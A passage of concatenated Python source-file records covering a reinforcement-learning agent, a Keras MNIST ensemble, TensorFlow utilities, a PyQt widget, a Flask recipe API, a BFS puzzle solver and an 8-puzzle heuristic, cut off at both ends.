optim\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.distributions.categorical import Categorical\n\nfrom ActorCritic.Models.Actor_Critic_Net import ActorCriticNet\nfrom Utils.env_util import get_env_space\n\n\nclass ActorCritic:\n def __init__(self,\n num_states,\n num_actions,\n learning_rate=0.002,\n gamma=0.995,\n eps=torch.finfo(torch.float32).eps,\n enable_gpu=False\n ):\n\n if enable_gpu:\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n else:\n self.device = torch.device(\"cpu\")\n\n self.actor_critc = ActorCriticNet(num_states, num_actions).to(self.device)\n\n self.optimizer = optim.Adam(self.actor_critc.parameters(), lr=learning_rate)\n\n self.gamma = gamma\n self.eps = eps\n\n self.values = [] # 记录每个 time step 状态对应的 value 估计\n self.rewards = [] # 记录每个 time step 对应的及时回报 r_t\n self.log_probs = [] # 记���每个 time step 对应的 log_probability\n self.cum_rewards = [] # 记录每个 time step 对应的 累计回报 G_t\n\n def calc_cumulative_rewards(self):\n R = 0.0\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n self.cum_rewards.insert(0, R)\n\n def choose_action(self, state):\n state = torch.tensor(state).unsqueeze(0).to(self.device).float()\n probs, value = self.actor_critc(state)\n\n # 对action进行采样,并计算log probability\n m = Categorical(probs)\n action = m.sample()\n log_prob = m.log_prob(action)\n\n self.log_probs.append(log_prob)\n self.values.append(value)\n\n return action.item()\n\n def learn(self):\n self.calc_cumulative_rewards()\n assert len(self.cum_rewards) == len(self.values)\n\n rewards = torch.tensor(self.cum_rewards).unsqueeze(-1).to(self.device)\n values = torch.stack(self.values).squeeze(-1)\n log_probs = torch.stack(self.log_probs)\n\n rewards = (rewards - rewards.mean()) / (rewards.std() + self.eps)\n advances = rewards - values\n\n loss = -(log_probs *advances).mean() + advances.pow(2).mean()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # 清空 buffer\n self.rewards.clear()\n self.log_probs.clear()\n self.cum_rewards.clear()\n self.values.clear()\n\n\nif __name__ == '__main__':\n env_id = 'MountainCar-v0'\n alg_id = 'ActorCritic'\n env, num_states, num_actions = get_env_space(env_id)\n\n agent = ActorCritic(num_states, num_actions, enable_gpu=True)\n episodes = 400\n\n writer = SummaryWriter()\n\n # 迭代所有episodes进行采样\n for i in range(episodes):\n # 当前episode开始\n state = env.reset()\n episode_reward = 0\n\n for t in range(8000):\n env.render()\n action = agent.choose_action(state)\n state, reward, done, info = env.step(action)\n\n episode_reward += reward\n agent.rewards.append(reward)\n\n # 当前episode 结束\n if done:\n writer.add_scalar(alg_id, episode_reward, i)\n print(\"episode: {} , the episode reward is {}\".format(i, round(episode_reward, 3)))\n break\n\n agent.learn()\n\n env.close()\n","sub_path":"ActorCritic/Actor_Critic.py","file_name":"Actor_Critic.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"525902434","text":"\"\"\"\nWorthy CLI app.\n\"\"\"\n\n# import pandas as pd\n\n\ndef decorate(s:str) -> None:\n\tprint('')\n\tprint(s)\n\tfor _ in range(len(s)):\n\t\tprint('-', end='')\n\tprint('\\n')\n\n\ngreeting = 'Welcome to Worthy CLI:'\ndecorate(greeting)\n\n\n\nwhile True:\n\tcmd = input('$>')\n\tcmd = cmd.lower()\n\tif cmd == 'exit':\n\t\tbreak\n\n\nprint('---\\nTerminated successfully.\\n')\n# EOA\n","sub_path":"worthy.py","file_name":"worthy.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"195671307","text":"import numpy as np\n\nnp.random.seed(23)\n\n# implementa regressão linear com gradiente descendente estocástico\nclass linear_regr(object):\n\n def __init__(self, learning_rate=0.0001, batch_size=5, training_iters=50):\n self.learning_rate = learning_rate\n self.training_iters = training_iters\n self.batch_size = batch_size\n\n def fit(self, X_train, y_train, plot=False):\n\n # formata os dados\n if len(X_train.values.shape) < 2:\n X = X_train.values.reshape(-1,1)\n X = np.insert(X, 0, 1, 1)\n\n # inicia os parâmetros com pequenos valores aleatórios\n # (nosso chute razoável)\n self.w_hat = np.random.normal(0,5, size = X[0].shape)\n\n for i in range(self.training_iters):\n\n # cria os mini-lotes\n offset = (i * self.batch_size) % (y_train.shape[0] - self.batch_size)\n batch_X = X[offset:(offset + self.batch_size), :]\n batch_y = y_train[offset:(offset + self.batch_size)]\n\n gradient = np.zeros(self.w_hat.shape) # inicia o gradiente\n\n # atualiza o gradiente com informação dos pontos do lote\n for point, yi in zip(batch_X, batch_y):\n gradient += (point * self.w_hat - yi) * point\n\n gradient *= self.learning_rate\n self.w_hat -= gradient\n\n def predict(self, X_test):\n # formata os dados\n if len(X_test.values.shape) < 2:\n X = X_test.values.reshape(-1,1)\n X = np.insert(X, 0, 1, 1)\n\n return np.dot(X, self.w_hat)\n\nregr = linear_regr(learning_rate=0.0003, training_iters=40)\nregr.fit(dados['x'], dados['y'])\n","sub_path":"Graddesc_Estoc.py","file_name":"Graddesc_Estoc.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547489960","text":"# 빙산\nimport sys\nfrom collections import deque\n\nR, C = map(int,sys.stdin.readline().split())\nA= []\nfor i in range(R):\n A.append(list(map(int,sys.stdin.readline().split())))\n\ndr = [0,1,0,-1]\ndc = [1,0,-1,0]\nhour = 0\ndef sol():\n global hour\n while(1):\n vis=[[0 for _ in range(C)] for _ in range(R)] \n stack = deque()\n cnt = 0\n vis_cnt = 0\n for i in range(1,R-1):\n for j in range(1,C-1):\n if A[i][j] > 0:\n cnt +=1\n if len(stack) == 0:\n stack.append([i,j])\n vis[i][j] = 1\n if len(stack) > 0:\n while(1):\n cur = stack.pop()\n vis_cnt +=1\n for i in range(4):\n cr = cur[0] + dr[i]\n cc = cur[1] + dc[i]\n if cr < 0 or cr >= R or cc < 0 or cc >= C: continue\n if vis[cr][cc] == 1 : continue\n # if A[cr][cc] == 0 and A[cur[0]][cur[1]]>0:\n if A[cr][cc] == 0:\n if A[cur[0]][cur[1]] > 0:\n A[cur[0]][cur[1]] -= 1\n continue\n\n vis[cr][cc] =1\n stack.append([cr,cc])\n if len(stack) == 0:\n break\n\n hour+=1\n\n if cnt == 0:\n print(0)\n break\n\n elif cnt > vis_cnt:\n print(hour-1)\n break\n\nsol()\n","sub_path":"Python/3주차_BFS,DFS/정글_3_2573.py","file_name":"정글_3_2573.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454863077","text":"from typing import Iterable\n\nimport tensorflow as tf\nfrom tensorflow.tools.graph_transforms import TransformGraph\n\nfrom nets.transformationnet import TransformationNet\n\n\ndef load_model_from_ckpt(sess: tf.Session,\n model_path: str) -> tf.Session:\n \"\"\"\n Load model from checkpoint.\n :param sess: Active TensorFlow session.\n :param model_path: model checkpoint path.\n :return: Active TensorFlow session containing the variables.\n \"\"\"\n\n saver = tf.train.import_meta_graph(model_path + '.meta', clear_devices=True)\n saver.restore(sess, model_path)\n\n return sess\n\n\ndef freeze_graph(sess: tf.Session,\n output_node_name: str) -> tf.Graph:\n \"\"\"\n Extract the sub graph defined by the output nodes and convert\n all its variables into constant\n :param sess: Active TensorFlow session containing the variables.\n :param output_node_name: name of the result node in the graph.\n :return: GraphDef containing a simplified version of the original.\n \"\"\"\n\n output_graph_def = tf.graph_util.convert_variables_to_constants(\n sess=sess,\n input_graph_def=tf.get_default_graph().as_graph_def(),\n output_node_names=[output_node_name]\n )\n\n return output_graph_def\n\n\ndef optimize_graphdef(input_graph_def: tf.GraphDef,\n input_node_name: str,\n output_node_name: str) -> tf.GraphDef:\n \"\"\"\n Optimize input GraphDef.\n :param input_graph_def: GraphDef containing a network.\n :param input_node_name: GraphDef input node name.\n :param output_node_name: GraphDef output node name.\n :return: GraphDef containing a optimized version of the original.\n \"\"\"\n\n optimized_graph_def = TransformGraph(\n input_graph_def=input_graph_def,\n inputs=[input_node_name],\n outputs=[output_node_name],\n transforms=[\"merge_duplicate_nodes\",\n \"strip_unused_nodes\",\n \"remove_device\",\n \"fold_constants\",\n \"flatten_atrous_conv\",\n \"fold_batch_norms\",\n \"fold_old_batch_norms\",\n \"fuse_pad_and_conv\",\n \"fuse_resize_pad_and_conv\",\n \"sort_by_execution_order\"]\n )\n\n return optimized_graph_def\n\n\n# TODO: move to networks folder.\ndef create_transformation_network(\n sess: tf.Session,\n model_ckpt_path: str,\n input_node_name: str,\n desired_input_shape: Iterable[int]) -> tf.Graph:\n \"\"\"\n Create transformation network from checkpoint.\n :param sess: Active TensorFlow session.\n :param model_ckpt_path: path where model checkpoint are stored.\n :param input_node_name: model input node name.\n :param desired_input_shape: transformation input shape.\n :return: tf.Graph with loaded model.\n \"\"\"\n img_placeholder = tf.placeholder(tf.float32,\n shape=desired_input_shape,\n name=input_node_name)\n\n transformation_network = TransformationNet()\n transformation_network.build_transformation_net(img_placeholder)\n\n saver = tf.train.Saver()\n try:\n saver.restore(sess, model_ckpt_path)\n except:\n raise RuntimeError('Something wrong with checkpoint. '\n 'Check checkpoint path.')\n\n return sess.graph\n","sub_path":"utils/graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"393484940","text":"#!/usr/bin/env python\n#country.py\n#Daphne Groot\n\nfrom PyQt4 import QtGui\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport sys\n\nclass Country(QtGui.QWidget):\n\tdef __init__(self):\n\t\tsuper(Country, self).__init__()\n\t\tself.initUI()\n\t\t\n\t\t\n\tdef initUI(self):\n\t\t\"\"\" Maakt de combobox en voegt de gegevens eraan toe.\n\t\tOok worden de connecties gemaakt naar de methode om de gegevens te updaten\"\"\"\n\t\t\n\t\tlanden = self.getCountry()\n\t\t\n\t\t#Combobox \"landennaam\"\n\t\tself.comboboxLand = QtGui.QComboBox(self)\n\t\tself.comboboxLand.addItems(landen)\n\t\tself.comboboxLand.adjustSize()\n\t\tself.comboboxLand.move(40, 30)\n\t\t\n\t\t#Connecties voor aanpassen aan nieuwe gegevens\n\t\tself.connect(self.comboboxLand,SIGNAL(\"currentIndexChanged(int)\"), self.updateUi)\n\t\t\n\t\t\n\tdef updateUi(self):\n\t\t\"\"\" Zorgt ervoor dat de gegevens in de combobox geupdate zijn \"\"\"\n\t\t#Aanpassen aan nieuwe gegevens\n\t\tlandnaam = str(self.comboboxLand.currentText())\n\t\t\n\t\tself.__str__(landnaam)\n\t\t\n\t\t\n\tdef getCountry(self):\n\t\t\"\"\" Haalt de landen namen op uit het bestand landennamen.txt \"\"\"\n\t\t#Landen namen uit bestand halen\n\t\tself.landen = []\n\t\twith open('landennamen.txt', 'r') as in_f:\n\t\t\tfor line in in_f:\n\t\t\t\tself.landen.append(line[:-1])\n\t\t\t\t\n\t\treturn self.landen\n\n\n\tdef __str__(self,landnaam):\n\t\t\"\"\"Een berichtje gevolgd door het gekozen land wordt geprint\"\"\" \n\t\tprint(\"Hello from \" + landnaam)\n\t\n\t\ndef main():\n\t\n\tapp = QtGui.QApplication(sys.argv)\n\tLandennaam = Country()\n\tLandennaam.setWindowTitle('Landennaam')\n\tLandennaam.setGeometry(300, 300, 300, 100)\n\tLandennaam.show()\n\tsys.exit(app.exec_())\n\n\t\n\t\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457511564","text":"import matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport time\r\nimport os #импортирање на оперативниот систем\r\nimport keras as keras\r\nfrom keras import backend as K\r\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\r\nfrom keras.models import Sequential\r\nfrom datetime import timedelta\r\n\r\n\r\nstart = time.time()\r\n\r\nprint('Вчитување на податоците....')\r\n\r\ntrain_file = './mnist_train.csv'\r\ntest_file = './mnist_test.csv'\r\n\r\ntrainSet = np.loadtxt(train_file, delimiter=',')\r\ntestSet = np.loadtxt(test_file, delimiter=',')\r\n\r\ntrain_data = trainSet[:, 1:785]\r\ntrain_labels = trainSet[:, :1]\r\n\r\ntest_data = testSet[:, 1:785]\r\ntest_labels = testSet[:, :1]\r\n\r\ndef one_hot(data):\r\n one_hot = []\r\n for item in data:\r\n if item == 0:\r\n one_h = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n elif item == 1:\r\n one_h = [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\r\n elif item == 2:\r\n one_h = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\r\n elif item == 3:\r\n one_h = [0, 0, 0, 1, 0, 0, 0, 0, 0, 0]\r\n elif item == 4:\r\n one_h = [0, 0, 0, 0, 1, 0, 0, 0, 0, 0]\r\n elif item == 5:\r\n one_h = [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]\r\n elif item == 6:\r\n one_h = [0, 0, 0, 0, 0, 0, 1, 0, 0, 0]\r\n elif item == 7:\r\n one_h = [0, 0, 0, 0, 0, 0, 0, 1, 0, 0]\r\n elif item == 8:\r\n one_h = [0, 0, 0, 0, 0, 0, 0, 0, 1, 0]\r\n elif item == 9:\r\n one_h = [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\r\n\r\n one_hot.append(one_h)\r\n one_hot = np.array(one_hot)\r\n return one_hot\r\n\r\n\r\ntrain_labels_one_hot = one_hot(train_labels)\r\ntest_labels_one_hot = one_hot(test_labels)\r\n\r\n\r\ndef plot_images(images, trueClass, ensembleClassPrediction=None, bestClassPrediction=None):\r\n fig, axes = plt.subplots(3, 3)\r\n if ensembleClassPrediction is None:\r\n hspace = 0.3\r\n else:\r\n hspace = 1.0\r\n fig.subplots_adjust(hspace=hspace, wspace=0.3)\r\n\r\n for i, ax in enumerate(axes.flat):\r\n if i < len(images):\r\n ax.imshow(images[i, :, :], cmap='gray')\r\n if ensembleClassPrediction is None:\r\n label = \"Точна класа: {0}\".format(int(trueClass[i]))\r\n else:\r\n msg = \"Точна класа: {0}\\nАнсамбл од мрежи: {1}\\nНајдобра мрежа: {2}\"\r\n label = msg.format(format(int(trueClass[i])),\r\n ensembleClassPrediction[i],\r\n bestClassPrediction[i])\r\n ax.set_xlabel(label)\r\n ax.set_xticks([])\r\n ax.set_yticks([])\r\n plt.show()\r\n\r\n\r\nimg_rows, img_cols = 28, 28\r\ntrain_images = train_data.reshape(train_data.shape[0], img_rows, img_cols)\r\ntest_images = test_data.reshape(test_data.shape[0], img_rows, img_cols)\r\n#plot_images(train_images[0:9], train_labels[0:9])\r\n\r\n\r\nif K.image_data_format() == 'channels_first':\r\n train_images = train_images.reshape(train_images.shape[0], 1, img_rows,img_cols) # train_images.shape[0] 60000\r\n test_images = test_images.reshape(test_images.shape[0], 1, img_rows, img_cols) # test_images.shape[0] 10000\r\n input_shape = (1, img_rows, img_cols)\r\nelse:\r\n train_images = train_images.reshape(train_images.shape[0], img_rows, img_cols, 1)\r\n test_images = test_images.reshape(test_images.shape[0], img_rows, img_cols, 1)\r\n input_shape = (img_rows, img_cols, 1)\r\n\r\n # Промена на типот на вредностите за пикселите од цели во децимални броеви\r\n train_images = train_images.astype('float32')\r\n test_images = test_images.astype('float32')\r\n\r\n # Min-max нормализација на податоците (скалирање во рангот помеѓу 0 и 1)\r\n def normalization(m):\r\n col_max = m.max(axis=0)\r\n col_min = m.min(axis=0)\r\n return (m - col_min) / (col_max - col_min)\r\n\r\n train_images = np.nan_to_num(normalization(train_images))\r\n test_images = np.nan_to_num(normalization(test_images))\r\n\r\n print('Класа на првата инстанца во тренинг множеството: ', format(int(train_labels[0])))\r\n print('Конверзија на класта во категориски атрибут (one-hot): ', train_labels_one_hot[0])\r\n\r\n classes = np.unique(train_labels)#0...9\r\n numClasses = len(classes) #10\r\n dataDimension = np.prod(train_data.shape[1:])#784\r\n\r\n directoryPath = './history/'\r\n if not os.path.exists(directoryPath):\r\n os.makedirs(directoryPath)\r\n def savePath(netNumber):\r\n return directoryPath + 'network' + str(netNumber)\r\n model.save(savePath(netNumber))\r\n\r\n netNumber = 1\r\n print(\"Kреирање на невронска мрежа: {0}\".format(netNumber))\r\n model = Sequential()\r\n model.add(Conv2D(15, (4, 4), padding='same', strides=1, activation='relu', input_shape=input_shape))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n model.add(Flatten())\r\n model.add(Dense(800, activation='relu'))\r\n model.add(Dropout(0.25))\r\n model.add(Dense(numClasses, activation='softmax'))\r\n sgd = keras.optimizers.SGD(lr=0.1, momentum=0.9)\r\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\n print('Во тек е тренирање на мрежата....')\r\n earlyStopping = keras.callbacks.EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')\r\n model.fit(train_images, train_labels_one_hot, callbacks=[earlyStopping], batch_size=250, epochs=100, verbose=2, validation_split=0.2, shuffle=True, class_weight=None, sample_weight=None)\r\n #Зачувување на моделот во HDF5 фајл\r\n model.save(savePath(netNumber))\r\n\r\n netNumber = 1 + netNumber\r\n print(\"Kреирање на невронска мрежа: {0}\".format(netNumber))\r\n model = Sequential()\r\n model.add(Conv2D(15, (4, 4), padding='same', strides=1, activation='relu', input_shape=input_shape))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n model.add(Flatten())\r\n model.add(Dense(900, activation='relu'))\r\n model.add(Dropout(0.25))\r\n model.add(Dense(numClasses, activation='softmax'))\r\n sgd = keras.optimizers.SGD(lr=0.1, momentum=0.9)\r\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\n print('Во тек е тренирање на мрежата....')\r\n earlyStopping = keras.callbacks.EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')\r\n model.fit(train_images, train_labels_one_hot, callbacks=[earlyStopping], batch_size=250, epochs=100, verbose=2,validation_split=0.2, shuffle=True, class_weight=None, sample_weight=None)\r\n # Зачувување на моделот во HDF5 фајл\r\n model.save(savePath(netNumber))\r\n\r\n netNumber = 1 + netNumber\r\n print(\"Kреирање на невронска мрежа: {0}\".format(netNumber))\r\n model = Sequential()\r\n model.add(Conv2D(5, (5,5), padding='same', strides=1, activation='relu', input_shape=input_shape))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n model.add(Conv2D(10, (4,4), padding='same',strides=1, activation='relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n model.add(Flatten())\r\n model.add(Dense(700, activation='relu'))\r\n model.add(Dropout(0.25))\r\n model.add(Dense(numClasses, activation='softmax'))\r\n sgd = keras.optimizers.SGD(lr=0.1, momentum=0.9)\r\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\n print('Во тек е тренирање на мрежата....')\r\n earlyStopping = keras.callbacks.EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')\r\n model.fit(train_images, train_labels_one_hot, callbacks=[earlyStopping], batch_size=250, epochs=100, verbose=2, validation_split=0.2, shuffle=True, class_weight=None, sample_weight=None)\r\n # Зачувување на моделот во HDF5 фајл\r\n model.save(savePath(netNumber))\r\n\r\n\r\n\r\n#-----------------до тука се тренира и зачувува секоја од мрежите\r\n\r\n\r\ndef ensemble_predictions():\r\n\r\n pred_labels = []\r\n test_accuracies = []\r\n\r\n for i in range(1, netNumber+1):\r\n\r\n model = keras.models.load_model(savePath(i))\r\n lossAcc = model.evaluate(test_images, test_labels_one_hot)\r\n print(i, '--функција на загуба за тест множество, точност за тест множество--', lossAcc)\r\n acc = lossAcc[1]\r\n test_accuracies.append(acc)\r\n predicetdLabels = model.predict(test_images)\r\n pred_labels.append(predicetdLabels)\r\n\r\n return np.array(test_accuracies),\\\r\n np.array(pred_labels)\r\n\r\ntest_accuracies, pred_labels = ensemble_predictions()\r\n\r\nend = time.time()\r\ntime = end - start\r\nprint(\"Време на извршување: \" + str(timedelta(seconds=int(round(time)))))\r\n\r\nprint(\"Облик од предвидени лабели од сите мрежи\", pred_labels.shape) # netNumber, 10000, 10\r\nprint(\"Облик од предвидена точност од сите мрежи\", test_accuracies.shape)\r\n\r\n\r\n#Ансамбл предвидување\r\nensemble_labelsPrediction = np.mean(pred_labels, axis=0) #10000, 10\r\nensemble_classPrediction = np.argmax(ensemble_labelsPrediction, axis=1) #10000, 1\r\n\r\n#print(\"test class\", test_labels.shape)\r\n#print(test_labels)\r\ntest_labels = test_labels.reshape((10000,))\r\n#print(\"test class\", test_labels.shape)\r\n#print(test_labels)\r\n\r\nensemble_correct = (ensemble_classPrediction == test_labels) #boolean array\r\nensemble_incorrect = np.logical_not(ensemble_correct)\r\n\r\n\r\n#Најдобра-мрежа предвидување\r\ntest_accuracies #array([ 0.9893, 0.988 , 0.9893, 0.9889, 0.9892])\r\nprint(test_accuracies)\r\nbest_net = np.argmax(test_accuracies)\r\nprint('Број на најдобра невронска мрежа:', best_net + 1)\r\nbestNet_labelsPrediction = pred_labels[best_net, :, :] #0, 10000, 10\r\nbestNet_classPrediction = np.argmax(bestNet_labelsPrediction, axis=1)\r\n\r\nbestNet_correct = (bestNet_classPrediction == test_labels) #boolean array\r\nbestNet_incorrect = np.logical_not(bestNet_correct)\r\n\r\n#Печатење на резултатите\r\nprint('Број на точно класифицирани инстанци преку ансамбл:', np.sum(ensemble_correct))\r\nprint('Број на точно класифицирани инстанци преку најдобраа мрежа:', np.sum(bestNet_correct))\r\n\r\nensemble_better = np.logical_and(bestNet_incorrect, ensemble_correct) #[1,0,1,0,0]\r\nprint('Број на инстанци каде што ансаблот на мрежи се покажал како подобар класификатор од најдобрата мрежа:', ensemble_better.sum())\r\n\r\nbestNet_better = np.logical_and(bestNet_correct, ensemble_incorrect) #[1,0,1,0,0]\r\nprint('Број на инстанци каде што најдобрата мрежа се покажала како подобар класификатор од ансамблот на мрежи:', bestNet_better.sum())\r\n\r\nprint('Точност на тест множество (најдобра мрежа):', test_accuracies[best_net])\r\nprint('Точност на тест множество (ансамбл):', ensemble_correct.mean())\r\n\r\ntest_images = test_data.reshape(test_data.shape[0], img_rows, img_cols)\r\n\r\n#Прикажување на слики_____________________________________________________________________________\r\ndef plot_images_comparison(idx):\r\n plot_images(images=test_images[idx, :],\r\n trueClass=test_labels[idx],\r\n ensembleClassPrediction=ensemble_classPrediction[idx],\r\n bestClassPrediction=bestNet_classPrediction[idx])\r\n\r\n#Прикажување на лабели_____________________________________________________________________________\r\ndef print_labels(labels, idx, num=1):\r\n labels = labels[idx, :]\r\n labels = labels[0:num, :]\r\n labels_rounded = np.round(labels, 2)\r\n print(labels_rounded)\r\n\r\ndef print_labels_ensemble(idx, **kwargs):\r\n print_labels(labels=ensemble_labelsPrediction, idx=idx, **kwargs) #labels= сите излезни лабели предвидени од ансамблот\r\n #idx = [1,0,1,0]\r\n #**kwargs = можеме да го смениме бројот на лабели што ќе ги печатиме\r\ndef print_labels_best_net(idx, **kwargs):\r\n print_labels(labels=bestNet_labelsPrediction, idx=idx, **kwargs) #labels= сите излезни лабели предвидени од најдобрата мрежа\r\n #idx = [1,0,1,0]\r\n #**kwargs = можеме да го смениме бројот на лабели што ќе ги печатиме\r\n \r\nprint_labels_ensemble(idx=ensemble_better, num=1) #num = колкав број на лабели да печатиме (**kwargs instead)\r\nprint_labels_best_net(idx=ensemble_better, num=1)\r\n\r\nprint_labels_ensemble(idx=bestNet_better, num=1)\r\nprint_labels_best_net(idx=bestNet_better, num=1)\r\n\r\nplot_images_comparison(idx=ensemble_better)\r\nplot_images_comparison(idx=bestNet_better)\r\n\r\n\r\n","sub_path":"ensembleKeraDifferentNets.py","file_name":"ensembleKeraDifferentNets.py","file_ext":"py","file_size_in_byte":13776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"531001601","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, url_for\nfrom flask import request\nimport json\n\nfrom entity.menu_detail import ResData, errorRes\nfrom db import db\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello !'\n\n\ndef getSteps(id):\n with db.get_dbconn() as conn:\n cur = conn.cursor()\n cur.execute(\"select * from menusteps where menudetailId = %s\" % str(id))\n res = [dict(id=row[0], step=row[2], detail=row[3]) for row in cur.fetchall()]\n\n return res\n\n\ndef getThings(id):\n with db.get_dbconn() as conn:\n cur = conn.cursor()\n cur.execute(\"select * from menuthings where menudetailId = %s\" % str(id))\n res = [dict(id=row[0], name=row[2], unit=row[3]) for row in cur.fetchall()]\n\n return res\n\n\n# def getThings(id):\n# with db.get_dbconn() as conn:\n# cur = conn.cursor()\n# cur.execute(\"select * from menuthings where menudetailId = %s\" % str(id))\n# res = [dict(id=row[0], name=row[2], unit=row[3]) for row in cur.fetchall()]\n#\n# return res\n\n\n@app.route('/menu/list')\ndef menu_list():\n limit = int(request.args.get(\"limit\", 20))\n cursor = int(request.args.get(\"cursor\", 0))\n conn = db.get_dbconn()\n dbcursor = conn.cursor()\n resData = ResData()\n if limit != 0:\n sql = \"select * from menudetail where id > %d limit %d\" % (cursor, limit)\n dbcursor.execute(sql)\n rows = dbcursor.fetchall()\n resData.data = dict(\n items=[dict(id=row[0], name=row[1], url=row[2], title=row[3], imgurl=row[4], desc=row[5], steps=getSteps(row[0]), things=getThings(row[0])) for row in rows])\n resData.data[\"nextCursor\"] = rows[-1][0]\n\n dbcursor.execute(\"select 1 from menudetail\")\n resData.data[\"totalCount\"] = dbcursor.fetchall().__len__()\n res = resData.toJsonRES()\n dbcursor.close()\n conn.commit()\n return res\n\n\n@app.route('/menu/item')\ndef menu_detail():\n id = int(request.args.get(\"id\"))\n with db.get_dbconn() as conn:\n cur = conn.cursor()\n cur.execute(\"select * from main.menudetail where id = %d\" % id)\n row = cur.fetchall()[0]\n resData = ResData(data=dict(id=row[0], name=row[1], url=row[2], title=row[3], imgurl=row[4], desc=row[5],\n steps=getSteps(row[0]), things=getThings(row[0])))\n if resData != None:\n return resData.toJsonRES()\n else:\n return errorRes(10000, \"错误\")\n\n\n@app.route('/menu/item/countnum/')\ndef menu_countnum(index=0):\n with db.get_dbconn() as conn:\n cur = conn.cursor()\n rows = cur.execute(\"select *from menudetail limit %d,1\" % index)\n row = cur.fetchone()\n resData = ResData(dict(id=row[0], name=row[1], url=row[2], title=row[3], imgurl=row[4], desc=row[5],\n steps=getSteps(row[0]), things=getThings(row[0])))\n\n if resData is not None:\n return resData.toJsonRES()\n else:\n return errorRes(10000, \"错误\")\n\n\nif __name__ == '__main__':\n app.config['DEBUG'] = True\n app.run(load_dotenv=False, host='0.0.0.0')\n","sub_path":"menuflask/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"590447916","text":"from search import astar\nfrom puzzle import State\nfrom util import import_pickled, int_to_num_list, num_list_to_int\nfrom itertools import combinations, chain\nfrom copy import deepcopy\nimport pickle\n\n\nxy_db = []\n\n\ndef import_xy_db(filename='hxy_db.pickle'):\n global xy_db\n try:\n xy_db = import_pickled(filename)\n except FileNotFoundError:\n response = input('Unable to locate pre-calculated X-Y heuristics database in file \"' + filename + '\". ' +\n 'Would you like to pre-calculate the X-Y heuristic now and save it to this file? (y/n)')\n if response == 'y':\n generate_hxy_db(filename)\n import_xy_db(filename)\n\n\ndef strips_to_str(strips):\n return ''.join([str(num) for num in chain(*strips)])\n\n\ndef strips_to_sequence(strips):\n return list(chain(*strips))\n\n\ndef sort_strips(strips):\n return [sorted(strip) for strip in strips]\n\n\ndef xy_sequence_from_state(state, dimension):\n xy_sequence = None\n if dimension == 'row':\n xy_sequence = state.get_rows()\n elif dimension == 'col':\n xy_sequence = state.get_cols()\n\n xy_sequence = sort_strips(xy_sequence)\n xy_sequence = strips_to_sequence(xy_sequence)\n return xy_sequence\n\n\nclass XYState(State):\n\n def __init__(self, state=None, strips=None, dimension='row', **kwargs):\n\n if state:\n sequence = xy_sequence_from_state(state, dimension)\n elif strips:\n strips = sort_strips(strips)\n sequence = strips_to_sequence(strips)\n\n State.__init__(self, sequence, **kwargs)\n\n def get_children(self):\n strips = self.get_rows()\n empty = 0\n for strip_index, strip in enumerate(strips):\n if self.empty in strip:\n empty = strip_index\n break\n\n adjacent = [empty - 1, empty + 1] # Assume middle\n if empty % self.side_length == 0: # Left edge\n adjacent = [empty + 1]\n elif (empty+1) % self.side_length == 0: # Right edge\n adjacent = [empty - 1]\n\n children = []\n for adjacent_strip in adjacent:\n for cell in strips[adjacent_strip]:\n child_strips = deepcopy(strips)\n child_strips[empty].remove(self.empty)\n child_strips[empty].append(cell)\n child_strips[adjacent_strip].remove(cell)\n child_strips[adjacent_strip].append(self.empty)\n children.append(XYState(strips=child_strips))\n return children\n\n\ndef h_xy_manhattan(start, goal):\n def find_in_strips(strips, value):\n for strip_num, strip in enumerate(strips):\n if value in strip:\n return strip_num\n\n score = 0\n\n start_strips = start.get_rows()\n goal_strips = goal.get_rows()\n\n for i in range(1, 9):\n score += abs(find_in_strips(start_strips, i) - find_in_strips(goal_strips, i))\n\n return {'value': score, 'nodes': 